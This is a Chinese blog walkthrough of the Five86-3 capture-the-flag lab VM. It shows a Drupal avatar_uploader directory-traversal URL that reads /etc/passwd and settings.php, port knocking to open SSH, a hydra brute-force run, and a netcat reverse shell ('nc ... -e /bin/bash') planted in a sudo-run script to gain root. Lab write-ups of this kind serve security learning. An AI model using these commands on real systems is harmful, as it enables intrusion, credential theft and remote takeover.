首页 > 其他分享 >Five86-3靶机测试记录

Five86-3靶机测试记录

时间:2022-10-07 18:31:07浏览次数:74  
标签:.. Five86 端口 sites 192.168 测试 靶机 74.138

靶机信息

靶机下载地址:​​https://www.five86.com/five86-3.html​

下载好靶机解压后,直接打开文件夹里的.ova文件即可

将靶机设置为NAT模式后,kali和靶机为同一网段


信息搜集

使用nmap扫描同网段的信息,筛选出目标ip地址

nmap -sn 192.168.74.0/24

Five86-3靶机测试记录_five86靶机

对目标主机做进一步的扫描

信息比较少,只有一个80端口的信息

nmap -A 192.168.74.138

漏洞利用

访问网站发现为drupal站点,版本为drupal 7,但是没有具体的版本号

Five86-3靶机测试记录_five86-3靶机_02

搜了下漏洞,试了几个sql注入和rce发现用不了

Five86-3靶机测试记录_five86-3靶机_03

最后是发现有个目录遍历的漏洞


Five86-3靶机测试记录_five86 3靶机_04

查看利用方法

Five86-3靶机测试记录_five86靶机_05

根据漏洞文档的内容构造url如下,读取到passwd内容

http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

Five86-3靶机测试记录_five86-3_06


构造url查看drupal配置文件路径

http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../var/www/html/sites/default/settings.php

Five86-3靶机测试记录_five86靶机_07

查看源代码看起来方便些,找到个密码x4lB0XxX,但是缺少用户名

Five86-3靶机测试记录_five86 3_08

根据passwd文件中的/bin/bash可以判断有4个可登录的用户

使用用户名和密码尝试登录站点,都失败了,密码可能不是站点的

passwd文件里发现了有sshd账号,可能有过滤的措施导致扫描的时候没有发现

Five86-3靶机测试记录_five86 3靶机_09

现在只能查看文件没法使用命令,无法确定是什么进程导致扫描不到端口

这时候可以通过查看cpu任务调度的文件来查看进程

发现一个特殊的进程knockd,需要指定的方式才能访问到端口,也叫端口敲门

http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../proc/sched_debug

Five86-3靶机测试记录_five86 3_10

查看knockd进程配置文件,需要依次向22端口发送5004,4284,6872

view-source:http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/knockd.conf

Five86-3靶机测试记录_five86 3_11

使用nmap敲击端口,再次扫描22端口后为开放状态

for x in 5004 4284 6872;do nmap -Pn --max-retries 0 -p $x 192.168.74.138;done

Five86-3靶机测试记录_five86 3靶机_12

把用户名写到文本中当做用户名字典,然后进行暴破,发现为sam账户的密码

hydra -L user.txt -p x4lB0XxX -t 5 -v ssh://192.168.74.138

Five86-3靶机测试记录_five86-3_13

权限提升

登录到sam账户

ssh -l sam 192.168.74.138

Five86-3靶机测试记录_five86 3靶机_14

sudo -l发现有个脚本文件,是一个重启apache的脚本

Five86-3靶机测试记录_five86-3靶机_15

有编辑权限,可以尝试反弹shell到kali上

sudo执行脚本后获取到管理权限,不sudo执行的话脚本无法执行,而且弹上去还是普通用户权限

nc 192.168.74.129 666 -e /bin/bash
nc -lvp 666

Five86-3靶机测试记录_five86-3_16

Five86-3靶机测试记录_five86靶机_17

最后在root目录下获取到flag

Five86-3靶机测试记录_five86 3_18

标签:..,Five86,端口,sites,192.168,测试,靶机,74.138
From: https://blog.51cto.com/Jach1n/5734863

相关文章

  • junit参数化测试的使用方法
     JUnit参数化测试的五个步骤:(1)为准备使用参数化测试的测试类指定特殊的运行器org.junit.runners.Parameterized。(2)为测试类声明几个变量,分别用于存放期望值和测试所用......
  • 性能测试知识科普(三)
    上一篇文章聊了性能测试中常见的测试策略以及如何选择合适的策略进行测试活动开展。这篇文章是性能测试知识科普的第三篇,我想聊聊很多性能测试小白最关心也最核心的问题......
  • 一些网络延迟测试工具
    主要整理一些工具,方便使用参考工具iperf比较老牌的,使用的用户比较多ethr微软基于golang开发的,新秀nuttcp基于了nttcp,原始来源是ttcpscamper一个比较强大的工具,集成了众多工......
  • orioledb 集成citus 测试
    前边制作了一个简单的orioledb集成citus的docker镜像​​dalongrong/orioledb:citus-11.0.5​​,以下是一个简单测试环境准备docker-compose文件version:'3'services:......
  • Python 冒泡排序,选择排序,归并排序, 希尔排序 算法 及测试
    使用代码实现冒泡排序,选择排序,归并排序,希尔排序4中算法完成下列任务。对1~100000序列打乱顺序,使用上述4种排序算法进行排序。每种算法排序重复100次排序过程中记录......
  • 若依使用postman登录进行api测试
    最近无聊研究一下若依的架构,但是不想在前端上有过多的纠结,因此想使用postman来操作后端的api进行测试。关闭验证码我们使用postman时传递验证码的base64非常繁琐,因此关闭......
  • Lombok 使用在 IDEA 中进行 JUnit 测试的时候提示 variable log 错误
    提示的错误信息如下:D:\WorkDir\USRealEstate\Source-Code\Common\common\src\test\java\com\ossez\common\tests\ConfTest.java:28:9java:cannotfindsymbolsymbol:v......
  • 接口测试 — Httpbin介绍(请求调试工具)
    1、Httpbin介绍Httpbin是一个使用Python+Flask编写的HTTPRequest&ResponseService,该服务主要用于测试HTTP库,你可以向他发送请求,然后他会按照指定的规则将你的请求......
  • Five86-1靶机测试记录
    靶机信息下载地址:https://www.five86.com/five86-1.html网络连接:NAT,kali和靶机为同一网段下载好靶机解压后,直接运行文件夹里的.ova文件即可信息搜集使用nmap扫描同网段......
  • 测试for和foreach循环跳出中断的问题
    1、for循环for使用return、break,是跳出了整个循环。 for(vari=0;i<5;i++){      console.log(i)      if(i==3){   ......